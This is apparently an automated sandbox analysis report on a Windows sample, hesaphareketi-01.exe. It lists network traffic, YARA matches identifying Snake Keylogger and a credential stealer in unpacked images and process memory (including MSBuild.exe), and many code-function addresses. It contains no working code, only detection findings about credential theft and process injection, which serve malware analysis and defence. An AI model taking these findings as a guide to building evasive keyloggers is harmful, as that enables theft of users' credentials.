Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56810
Source: unknown	Network traffic detected: HTTP traffic on port 56828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 50182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 56900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56827
Source: unknown	Network traffic detected: HTTP traffic on port 56896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56829
Source: unknown	Network traffic detected: HTTP traffic on port 56911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56825
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50168
Source: unknown	Network traffic detected: HTTP traffic on port 56806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56820
Source: unknown	Network traffic detected: HTTP traffic on port 56862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 56922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56798
Source: unknown	Network traffic detected: HTTP traffic on port 50219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:56801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:56922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50270 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_00F4D63C	0_2_00F4D63C
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_07242278	0_2_07242278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1B328	9_2_02B1B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1C190	9_2_02B1C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B16108	9_2_02B16108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B16730	9_2_02B16730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1F778	9_2_02B1F778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1C752	9_2_02B1C752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1E431	9_2_02B1E431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1C473	9_2_02B1C473
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B14AD9	9_2_02B14AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1CA32	9_2_02B1CA32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1BBB8	9_2_02B1BBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B19858	9_2_02B19858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1BEB0	9_2_02B1BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1D7F0	9_2_02B1D7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1D7E0	9_2_02B1D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B1B4F2	9_2_02B1B4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_02B13572	9_2_02B13572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06757E78	9_2_06757E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06750D60	9_2_06750D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06757588	9_2_06757588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06753288	9_2_06753288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06757E37	9_2_06757E37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675D618	9_2_0675D618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06756E00	9_2_06756E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06757E0F	9_2_06757E0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675D609	9_2_0675D609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675AEEF	9_2_0675AEEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675DEC8	9_2_0675DEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675DEB8	9_2_0675DEB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675E778	9_2_0675E778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675E768	9_2_0675E768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675AF00	9_2_0675AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675B7B0	9_2_0675B7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675B7A0	9_2_0675B7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067577A8	9_2_067577A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675F471	9_2_0675F471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675BC08	9_2_0675BC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675C4B8	9_2_0675C4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067504A0	9_2_067504A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675C4A8	9_2_0675C4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06750491	9_2_06750491
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675F480	9_2_0675F480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675CD68	9_2_0675CD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06750D50	9_2_06750D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675CD58	9_2_0675CD58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675DA70	9_2_0675DA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675327B	9_2_0675327B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675DA63	9_2_0675DA63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675B358	9_2_0675B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675B348	9_2_0675B348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675E320	9_2_0675E320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675E310	9_2_0675E310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675BBF8	9_2_0675BBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675EBD0	9_2_0675EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675EBC1	9_2_0675EBC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675C060	9_2_0675C060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675C050	9_2_0675C050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06750040	9_2_06750040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675F028	9_2_0675F028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675F018	9_2_0675F018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06750007	9_2_06750007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067508F0	9_2_067508F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675F8D8	9_2_0675F8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675F8C9	9_2_0675F8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675C910	9_2_0675C910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06750900	9_2_06750900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675C903	9_2_0675C903
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675D1C0	9_2_0675D1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0675D1B0	9_2_0675D1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678D218	9_2_0678D218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678A600	9_2_0678A600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678B290	9_2_0678B290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678BF30	9_2_0678BF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06788B00	9_2_06788B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678CBD0	9_2_0678CBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06789FB0	9_2_06789FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678AC48	9_2_0678AC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678B8E0	9_2_0678B8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06780D48	9_2_06780D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067885B0	9_2_067885B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678C580	9_2_0678C580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06785E70	9_2_06785E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06785E60	9_2_06785E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06785A18	9_2_06785A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06785A08	9_2_06785A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678D20B	9_2_0678D20B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678EE0F	9_2_0678EE0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067836D8	9_2_067836D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067862C8	9_2_067862C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067862BB	9_2_067862BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678B281	9_2_0678B281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06786B78	9_2_06786B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06786B69	9_2_06786B69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06783360	9_2_06783360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06783350	9_2_06783350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06786720	9_2_06786720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678BF20	9_2_0678BF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06786713	9_2_06786713
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06786FF8	9_2_06786FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067843D8	9_2_067843D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678CBC0	9_2_0678CBC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06789FA0	9_2_06789FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06782858	9_2_06782858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06787450	9_2_06787450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06782848	9_2_06782848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06780040	9_2_06780040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678003D	9_2_0678003D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678743F	9_2_0678743F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678AC37	9_2_0678AC37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067808F0	9_2_067808F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06787CF0	9_2_06787CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067808E1	9_2_067808E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678B8D0	9_2_0678B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067878A8	9_2_067878A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06780498	9_2_06780498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06787898	9_2_06787898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06780488	9_2_06780488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678C570	9_2_0678C570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06788158	9_2_06788158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06788148	9_2_06788148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06785140	9_2_06785140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06780D39	9_2_06780D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06785133	9_2_06785133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_06787D00	9_2_06787D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0678A5F0	9_2_0678A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067855C0	9_2_067855C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_067885A0	9_2_067885A0
